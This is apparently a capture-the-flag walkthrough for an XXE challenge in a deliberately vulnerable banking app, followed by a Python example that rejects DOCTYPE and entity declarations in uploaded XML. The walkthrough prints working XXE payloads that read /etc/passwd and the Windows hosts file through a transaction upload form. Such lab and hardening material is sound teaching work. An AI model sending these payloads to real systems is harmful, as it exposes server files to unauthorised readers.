# Challenges

## XXE

Depending on which OS the application is running on, different files are worth requesting. For instance, if the application is running on a Windows server, we can expect the file `C:/Windows/System32/drivers/etc/hosts` to exist. On the other hand, if the app is running on Linux, we can expect `/etc/passwd` to exist.

### Solution

If you visit the transaction page, you will see a form where you can upload transactions. This form requires an XML file. If we upload a simple XXE sample, the response will contain the contents of the file at the specified path.

![](/files/-M4x9-EU2xdbEtdGMArp)

* If you are trying to get `C:/Windows/System32/drivers/etc/hosts`:

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">
]>
<foo>&xxe;</foo>
```

* If you are trying to get `/etc/passwd`:

```markup
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
```

You will find the flag in the response header.
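The challenge works because the upload handler lets the XML parser declare and resolve external entities. The following is an added example, not code from the challenge or the SecureBank project, showing how an upload handler can refuse such documents before any entity is resolved: it uses only the Python standard library (`xml.parsers.expat` and `xml.etree.ElementTree`), and the `<transactions>` document format, the `check_no_dtd` / `parse_transactions` / `classify` function names and the sample documents are constructed for this example.

```python
"""Hardened handling of an uploaded XML transaction file (constructed example).

A DOCTYPE or any <!ENTITY ...> declaration is rejected before the document
body is parsed, so a SYSTEM entity pointing at a local file is never resolved.
"""
import xml.parsers.expat
import xml.etree.ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when an uploaded document tries to declare a DTD or entities."""


def check_no_dtd(data: bytes) -> None:
    """Scan the document with expat and abort on any DOCTYPE or entity declaration.

    expat only fetches an external entity if an ExternalEntityRefHandler is
    installed, but this check stops earlier: the first DOCTYPE or entity
    declaration raises UnsafeXMLError, before the document body is reached.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE declaration not allowed (root {name!r})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration not allowed: {name!r}")

    def on_external_ref(context, base, sysid, pubid):
        # Defence in depth: refuse to resolve any external entity at all.
        raise UnsafeXMLError(f"external entity reference blocked: {sysid!r}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    parser.ExternalEntityRefHandler = on_external_ref
    parser.Parse(data, True)  # exceptions raised in handlers propagate here


def parse_transactions(data: bytes) -> list[dict]:
    """Validate the upload, then return one dict of attributes per <transaction>."""
    check_no_dtd(data)
    root = ET.fromstring(data)
    return [dict(tx.attrib) for tx in root.iter("transaction")]


def classify(data: bytes) -> str:
    """Return 'accepted' or 'rejected: <reason>' for an uploaded document."""
    try:
        parse_transactions(data)
        return "accepted"
    except UnsafeXMLError as exc:
        return f"rejected: {exc}"


# Constructed sample uploads: a benign transaction file and the XXE payload
# from the challenge writeup above.
BENIGN = b"""<?xml version="1.0" encoding="UTF-8"?>
<transactions>
  <transaction id="1" amount="12.50" to="ACCOUNT-CONSTRUCTED-1"/>
  <transaction id="2" amount="99.00" to="ACCOUNT-CONSTRUCTED-2"/>
</transactions>
"""

XXE = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ELEMENT foo ANY>
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
"""

if __name__ == "__main__":
    print("benign upload:", classify(BENIGN))
    print("xxe upload:   ", classify(XXE))
```

Rejecting the DOCTYPE outright is the simplest fix for a format that never needs one; if a DTD is genuinely required, keep the `EntityDeclHandler` and `ExternalEntityRefHandler` refusals and drop only the DOCTYPE check. Note that Python's `xml.etree.ElementTree` already refuses to expand external entities on its own, but the explicit pre-check gives a clear rejection reason to log instead of a generic parse error.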
